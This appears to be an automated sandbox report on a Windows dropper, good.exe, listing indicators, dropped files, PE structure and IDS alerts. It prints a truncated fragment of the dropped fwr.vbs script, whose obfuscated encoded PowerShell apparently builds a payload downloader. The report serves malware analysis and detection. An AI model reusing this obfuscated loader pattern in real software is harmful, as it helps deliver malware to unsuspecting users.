                                                                                          rEzX7eqgfo.exeGet hashmaliciousKeyLogger, StormKitty, VenomRATBrowse
                                                                                          • 62.60.226.26
                                                                                          6.elfGet hashmaliciousUnknownBrowse
                                                                                          • 62.60.239.47
                                                                                          fYT3jJZgOX.exeGet hashmaliciousNjratBrowse
                                                                                          • 154.197.69.14
                                                                                          la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                          • 180.223.114.199
                                                                                          pTvHtQDXio.exeGet hashmaliciousAmadeyBrowse
                                                                                          • 62.60.226.15
                                                                                          IGz.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                          • 213.176.118.46
                                                                                          sh4.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                          • 185.177.25.107
                                                                                          i586.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                          • 185.177.25.107
                                                                                          AMAZON-02USDoc.exeGet hashmaliciousFormBookBrowse
                                                                                          • 13.248.169.48
                                                                                          PO#3210046374.exeGet hashmaliciousFormBookBrowse
                                                                                          • 13.248.169.48
                                                                                          Purchase Order sheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 54.252.88.45
                                                                                          0000003323677.jsGet hashmaliciousRevengeRATBrowse
                                                                                          • 13.49.66.229
                                                                                          Purchase Order sheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 54.252.88.45
                                                                                          Payment Advice.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 18.197.190.144
                                                                                          Purchase Order sheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 18.184.20.38
                                                                                          Payment Advice.xlsGet hashmaliciousUnknownBrowse
                                                                                          • 18.184.20.38
                                                                                          Solicita#U00e7#U00e3o n#U00ba 9822342.jsGet hashmaliciousRevengeRATBrowse
                                                                                          • 13.49.66.229
                                                                                          Purchase Order sheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                          • 18.197.190.144

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          3b5074b1b5d032e5620f69f9f700ff0enicegirlkissedmewithloverissingmegoodgreatthings.htaGet hashmaliciousBlackHacker JS Obfuscator, Cobalt Strike, RemcosBrowse
                                                                                          • 54.231.134.241
                                                                                          • 185.166.143.48
                                                                                          20250120.jsGet hashmaliciousUnknownBrowse
                                                                                          • 54.231.134.241
                                                                                          • 185.166.143.48
                                                                                          uwmC39FNho.exeGet hashmaliciousRemcosBrowse
                                                                                          • 54.231.134.241
                                                                                          • 185.166.143.48
                                                                                          Docs PRE-ALERT 1978 Kgs - 3.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 54.231.134.241
                                                                                          • 185.166.143.48
                                                                                          Inquiry- HQ242654.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 54.231.134.241
                                                                                          • 185.166.143.48
                                                                                          IMG_1050327.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 54.231.134.241
                                                                                          • 185.166.143.48
                                                                                          OZEKESSEVEN.20.01.2025.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 54.231.134.241
                                                                                          • 185.166.143.48
                                                                                          SGFDPPIOPP.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 54.231.134.241
                                                                                          • 185.166.143.48
                                                                                          https://jantaexpress.com/UyRV4rCGet hashmaliciousUnknownBrowse
                                                                                          • 54.231.134.241
                                                                                          • 185.166.143.48
                                                                                          Ref#2600902.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 54.231.134.241
                                                                                          • 185.166.143.48

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllulp77th:NllU
                                                                                          MD5:7B5F360646F3167812DC4ADF7B166512
                                                                                          SHA1:F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
                                                                                          SHA-256:672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
                                                                                          SHA-512:7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
                                                                                          Malicious:false
                                                                                          Preview:@...e.................................x..............@..........

                                                                                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\good.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):14990
                                                                                          Entropy (8bit):5.438346483798337
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ciEjU3m2OhEHbEhiJC8ZOZg3jISajc7NF9Wu0MDxpnO/9v2f4I:hEiOy7918Zgrtv10MFpWv2fv
                                                                                          MD5:A56574DF53497ABAFF046A5D5DF0AE83
                                                                                          SHA1:44AA16D98C7E3D57EF02EB4E657B6A48A64BC47D
                                                                                          SHA-256:A570A8999D880F2F3BFB91902308DC65D6F6274717D9E52F7BF3E294477AA785
                                                                                          SHA-512:7DBFDF3675366230DFCCA5523351BADE4BEF45BAEE7B2D48E2B80F2E6CB8B829CAF71E03652E12C408BFEB850849EFC485275CBC8F53020FB55F5AE99B28E044
                                                                                          Malicious:true
                                                                                          Preview: 'g.. WScript.Sleep 20000..mmhmaAgmgoA = rRegisggfgdsadfkjhgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..kimAIjFcf = TimeSerial(9,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..kimAIjFcf = TimeSerial(2,2,1)..Call Ugsfisging("$do" & "sigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE")..Call Ugsfisging("@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0")..gimcfaSpo = TimeSerial(7,7,9)..Public Const AeebFmm = "phardniA"..fgIrfnmj = "hffhfg" & LenB("mojIkikb") & "hfg"..'dIomajkrp AbhjgdI..SAmSffjbj = TimeSerial(9,9,7)..Public Const Irmmbdgp = "AoiSFFmm"..Call Ugsfisging("@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6")..Call Ugsfisging("@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bw")..Call Ugsfisging("Bu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7")..adeecoer = TimeSerial(9,8,9)..Public Const nbmgjIA = "c

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1gkkrdfo.g4p.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3izxplpj.xvu.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vjssb2b.apa.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c5ltxcog.mun.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnjinj4r.hgf.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtm5etse.snl.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Entropy (8bit):6.911938738434359
                                                                                          TrID:
                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:good.exe
                                                                                          File size:164'352 bytes
                                                                                          MD5:1f060be9fbfe90811a71414791ab8c1b
                                                                                          SHA1:5ecbda765ea1c558ef61dc5933ab7aefc279e1b3
                                                                                          SHA256:b682165c83920ef53701d66dbc579701c402201b8dd0c150a7f3fff5195274fd
                                                                                          SHA512:88bebad5e5c6c067327ff13d8565ffd05f349587eac22fb91166c6df7cb1048075ba619a486481aa506a7478b09b082a1330fcf3f80a020e05b3d07feb9445bc
                                                                                          SSDEEP:3072:zahKyd2n31j5GWp1icKAArDZz4N9GhbkrNEkEnRI:zahOLp0yN90QEG
                                                                                          TLSH:6DF38D0FA6E860B6D478837045E302C35672B971576856FF22CEED795E232F07236B4A
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

                                                                                          File Icon

                                                                                          Icon Hash:3b6120282c4c5a1f

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x140008200
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x140000000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:10
                                                                                          OS Version Minor:0
                                                                                          File Version Major:10
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:10
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          dec eax
                                                                                          sub esp, 28h
                                                                                          call 00007F4F5126C3D0h
                                                                                          dec eax
                                                                                          add esp, 28h
                                                                                          jmp 00007F4F5126BC7Bh
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          dec eax
                                                                                          mov dword ptr [esp+08h], ebx
                                                                                          dec eax
                                                                                          mov dword ptr [esp+10h], edi
                                                                                          inc ecx
                                                                                          push esi
                                                                                          dec eax
                                                                                          sub esp, 000000B0h
                                                                                          and dword ptr [esp+20h], 00000000h
                                                                                          dec eax
                                                                                          lea ecx, dword ptr [esp+40h]
                                                                                          call dword ptr [000011CDh]
                                                                                          nop
                                                                                          dec eax
                                                                                          mov eax, dword ptr [00000030h]
                                                                                          dec eax
                                                                                          mov ebx, dword ptr [eax+08h]
                                                                                          xor edi, edi
                                                                                          xor eax, eax
                                                                                          dec eax
                                                                                          cmpxchg dword ptr [00004922h], ebx
                                                                                          je 00007F4F5126BC7Ch
                                                                                          dec eax
                                                                                          cmp eax, ebx
                                                                                          jne 00007F4F5126BC8Ch
                                                                                          mov edi, 00000001h
                                                                                          mov eax, dword ptr [00004918h]
                                                                                          cmp eax, 01h
                                                                                          jne 00007F4F5126BC89h
                                                                                          lea ecx, dword ptr [eax+1Eh]
                                                                                          call 00007F4F5126C263h
                                                                                          jmp 00007F4F5126BCECh
                                                                                          mov ecx, 000003E8h
                                                                                          call dword ptr [0000117Eh]
                                                                                          jmp 00007F4F5126BC39h
                                                                                          mov eax, dword ptr [000048F6h]
                                                                                          test eax, eax
                                                                                          jne 00007F4F5126BCCBh
                                                                                          mov dword ptr [000048E8h], 00000001h
                                                                                          dec esp
                                                                                          lea esi, dword ptr [000013E9h]
                                                                                          dec eax
                                                                                          lea ebx, dword ptr [000013CAh]
                                                                                          dec eax
                                                                                          mov dword ptr [esp+30h], ebx
                                                                                          mov dword ptr [esp+24h], eax
                                                                                          dec ecx
                                                                                          cmp ebx, esi
                                                                                          jnc 00007F4F5126BC97h
                                                                                          test eax, eax
                                                                                          jne 00007F4F5126BC97h
                                                                                          dec eax
                                                                                          cmp dword ptr [ebx], 00000000h
                                                                                          je 00007F4F5126BC82h
                                                                                          dec eax
                                                                                          mov eax, dword ptr [ebx]
                                                                                          dec eax
                                                                                          mov ecx, dword ptr [00001388h]

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa23c0xb4.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1d0b4.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x408.pdata
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2d0000x20.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x9a100x54.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x118.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x91280x520.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x7b800x7c0060800deac1fde21b98089f2241ee6168False0.5499936995967742data6.096261782871538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x90000x22c80x240059d15cdf89780817c3d48dd588a6a129False0.4136284722222222data4.727841929207054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0xc0000x1f000x4009d1580dccaf8e787a43caf4bba48a079False0.3212890625data3.1889769845125677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .pdata0xe0000x4080x60015cd12257317071f28e4f7b728f8825eFalse0.3932291666666667data3.1563665040475675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xf0000x1e0000x1d2001851dda2b6b63856da981589b51ae9d8False0.735221633583691data7.118009034793152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x2d0000x200x200637787151ee546a94902de9694a58fd6False0.083984375data0.4068473715812382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          AVI0xfa100x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                                                          RT_ICON0x1282c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                                          RT_ICON0x12e940x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                                                          RT_ICON0x1317c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                                                                                          RT_ICON0x133640x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                                          RT_ICON0x1348c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                                          RT_ICON0x143340x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                                          RT_ICON0x14bdc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                                                                                          RT_ICON0x152a40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                                          RT_ICON0x1580c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                                                          RT_ICON0x231e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                                          RT_ICON0x257880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                                          RT_ICON0x268300x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                                                                                          RT_ICON0x271b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                                          RT_DIALOG0x276200x35cdataRussianRussia0.44534883720930235
                                                                                          RT_DIALOG0x2797c0x1b4dataRussianRussia0.573394495412844
                                                                                          RT_DIALOG0x27b300x168dataRussianRussia0.5361111111111111
                                                                                          RT_DIALOG0x27c980x1e0dataRussianRussia0.55
                                                                                          RT_DIALOG0x27e780x150dataRussianRussia0.5416666666666666
                                                                                          RT_DIALOG0x27fc80x122dataRussianRussia0.5793103448275863
                                                                                          RT_STRING0x280ec0x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia0.7164179104477612
                                                                                          RT_STRING0x281740x52edataRussianRussia0.39441930618401205
                                                                                          RT_STRING0x286a40x592dataRussianRussia0.4011220196353436
                                                                                          RT_STRING0x28c380x4b2dataRussianRussia0.3910149750415973
                                                                                          RT_STRING0x290ec0x43edataRussianRussia0.4567219152854512
                                                                                          RT_STRING0x2952c0x2fcdataRussianRussia0.4424083769633508
                                                                                          RT_RCDATA0x298280x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                          RT_RCDATA0x298300x174aMicrosoft Cabinet archive data, Windows 2000/XP setup, 5962 bytes, 1 file, at 0x2c +A "fwr.vbs", ID 712, number 1, 1 datablock, 0x1503 compressionRussianRussia1.0018450184501846
                                                                                          RT_RCDATA0x2af7c0x4dataRussianRussia3.0
                                                                                          RT_RCDATA0x2af800x24dataRussianRussia0.7222222222222222
                                                                                          RT_RCDATA0x2afa40x7ASCII text, with no line terminatorsRussianRussia2.142857142857143
                                                                                          RT_RCDATA0x2afac0x7ASCII text, with no line terminatorsRussianRussia2.142857142857143
                                                                                          RT_RCDATA0x2afb40x4dataRussianRussia3.0
                                                                                          RT_RCDATA0x2afb80x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                          RT_RCDATA0x2afc00x4dataRussianRussia3.0
                                                                                          RT_RCDATA0x2afc40x13ASCII text, with no line terminatorsEnglishUnited States1.4210526315789473
                                                                                          RT_RCDATA0x2afd80x4dataRussianRussia3.0
                                                                                          RT_RCDATA0x2afdc0x8dataRussianRussia2.0
                                                                                          RT_RCDATA0x2afe40x7ASCII text, with no line terminatorsRussianRussia2.142857142857143
                                                                                          RT_RCDATA0x2afec0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                          RT_GROUP_ICON0x2aff40xbcdataEnglishUnited States0.6117021276595744
                                                                                          RT_VERSION0x2b0b00x400dataEnglishUnited States0.416015625
                                                                                          RT_VERSION0x2b4b00x41cdataRussianRussia0.46577946768060835
                                                                                          RT_MANIFEST0x2b8cc0x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906

                                                                                          Imports

                                                                                          DLLImport
                                                                                          ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                          KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                                                                                          GDI32.dllGetDeviceCaps
                                                                                          USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                                                                                          msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                                                                                          COMCTL32.dll
                                                                                          Cabinet.dll
                                                                                          VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States
                                                                                          RussianRussia

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2025-01-20T15:48:50.614088+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound162.60.226.6480192.168.2.449739TCP
                                                                                          2025-01-20T15:49:13.952121+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2154.231.134.241443192.168.2.449738TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 20, 2025 15:49:10.553081036 CET49737443192.168.2.4185.166.143.48
                                                                                          Jan 20, 2025 15:49:10.553174973 CET44349737185.166.143.48192.168.2.4
                                                                                          Jan 20, 2025 15:49:10.553288937 CET49737443192.168.2.4185.166.143.48
